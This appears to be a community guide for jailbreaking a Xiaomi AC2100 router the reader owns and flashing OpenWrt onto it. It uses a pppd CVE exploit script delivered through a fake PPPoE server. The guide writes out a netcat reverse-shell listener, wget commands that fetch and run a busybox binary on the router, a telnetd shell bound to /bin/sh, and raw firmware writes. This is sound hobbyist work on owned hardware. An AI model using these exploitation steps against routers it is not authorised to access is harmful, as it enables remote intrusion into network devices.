• Acknowledgements and resources
• Migrating from old image
• Intro and Setup
  • Disclaimer
  • Requirements
• Installing packages (macOS specific)
• 1. Download files
• 2. Reset your router
• 3. Insert LAN cables
• 4. Setup TCP/IP
• 5. Determining your network interface
• 6. PPPoE simulator
• 7. Running the exploit
• 8. Post-install

This guide is based on the video of 韩风 Talk. Since many people don't know any Mandarin or don't use Windows, I've decided to write down my method of getting this to work. This is also helping people to understand more about the process rather than using a one-click solution.

pppoe-simulator.py by Percy233

pppd-cve.py by namidairo

You can skip reading this when you didn't flash with the old guide.

In case you used the Chinese Redmi image you can use the sysupgrade package provided in this repo. Since the R2100 (Black Cylinder) now is uniquely identified you will need to force the system upgrade.

Use any tool of your choice to transfer the sysupgrade.bin to the /tmp directory of your router

sysupgrade -v -F -n /tmp/xiaomi-router-sysupgrade.bin

If you find any mistakes in this guide, please submit a PR 👍🏻.

You can potentially brick your device. I don't take responsibility for any damage caused.

1. A computer with an ethernet adapter
2. Two LAN cables
3. python3, scapy, netcat
4. Files from this repo
   • busybox
   • pppoe-simulator.py
   • pppd-cve.py
   • xiaomi-router-kernel1.bin
   • xiaomi-router-rootfs0.bin

I'll be using a Macintosh in this guide. If you use Linux, I assume you are smart enough to install the required packages yourself. Please note that python3 is aliased to python3 on macOS and some Linux distributions. Replace python3 and pip3 with python and pip on Windows/Linux accordingly.

Before we start, please check your python version with:

python --version

Version 2 will not work.

Go to https://brew.sh/ and run the installation script in your terminal, then proceed to install the required packages:

brew install python3 netcat

Install scapy for python:

pip3 install scapy

• Clone the repo or download as .zip
• Make a folder with the following files and cd into it

Feel free to use your own images if you know what you are doing. For the case you are using the images in this repo, please ensure the provided .bin files have the correct sha256sum:

sha256sum *bin
9242477eaa7df12e00d369d5132b754b76af7dc8e7f4cd9e1c1483aba824ebbe  xiaomi-router-kernel1.bin
141d6af6ae3b41c44fe8fe3728638acf1b286e5f204cd16381593c10f2cdd94c  xiaomi-router-rootfs0.bin
e53c69e2443154feb80320ebc1c58c10e08076f132291f01d9d7f5160c0aed6c  xiaomi-router-sysupgrade.bin

• Plug in your AC2100
• Wait for the system light to turn blue
• Hold the reset button until the light turns yellow
• Plug out your router

• Bridge WAN and Port 1 (blue) with your first LAN cable
• Connect the second LAN cable to Port 2 and your computer (yellow)

• Go to your network settings
• Set the following for IPv4

• Plug in your router
• Wait for the indicator LED to turn blue

You should now be able to ping the router at 192.168.31.1.

• Run ifconfig
• Check for an interface with configured address 192.168.31.177 (see image below)
• Change the name of your interface in ppd-cve.py and pppoe-simulator.py (in my case it was en7)

# Line 5 of both script files
interface = "yourinterface"

• Open up http://192.168.31.1 in your browser
• If there is a terms and conditions screen, click on 马上体验
• Click on 继续配置 (see image)

Start the pppoe-simulator:

python3 pppoe-simulator.py

You may need to run this as root for scapy to function properly. The script should show Waiting for packets.

Click on the field that says PPPOE.

Enter credentials (anything should be fine). I just use 123 for both. After that click on 下一步.

Requests should now appear in your PPPoE terminal window:

Also your web browser should now display this instead of a loading spinner:

Open up two new terminal sessions.

Start an HTTP server where we can wget the files from later. Make sure to be in the folder that contains the repo files.

python3 -m http.server 80

Start the netcat network utility.

netcat -nvlp 31337

Run pppd-cve.py in a new terminal session:

python3 pppd-cve.py

When the packet has been sent successfully, you should be able to see a connection from 192.168.31.1:63627 in your netcat session.

This connection can be unstable and you may need to rerun netcat and pppd-cve.py if it drops.

If you do the following commands quickly, there should be no issues:

cd /tmp
wget http://192.168.31.177/busybox
chmod a+x ./busybox
./busybox telnetd -l /bin/sh

We should now have telnet access (you can find all commands in commands.txt):

telnet 192.168.31.1

Use wget to pull our files from the http server on the router:

wget http://192.168.31.177/xiaomi-router-rootfs0.bin
wget http://192.168.31.177/xiaomi-router-kernel1.bin&&nvram set uart_en=1&&nvram set bootdelay=5&&nvram set flag_try_sys1_failed=1&&nvram commit

Observation: Files are being requested in your http server session:

All what is left now is to write our images:

mtd write xiaomi-router-kernel1.bin kernel1
mtd -r write xiaomi-router-rootfs0.bin rootfs0

Your device should now reboot. First the LED blinks yellow for a couple of seconds before turning blue. When it turns blue again, you now have successfully set up OpenWrt. Congratulations!

What you can do now:

• Close all terminal sessions
• Revert your TCP/IP settings
• Remove the bridge cable
• Connect the router to the internet again

username: root
password: password

The router IP should be visible in your network settings (in my case http://192.168.1.1). LuCI web-interface is configured with HTTPS on this image. To use HTTPS you need to take additional steps to trust the certificate on your machine. If you want to just bypass the HTTPS errors you will need to use Firefox and add an exception.

ssh root@routerip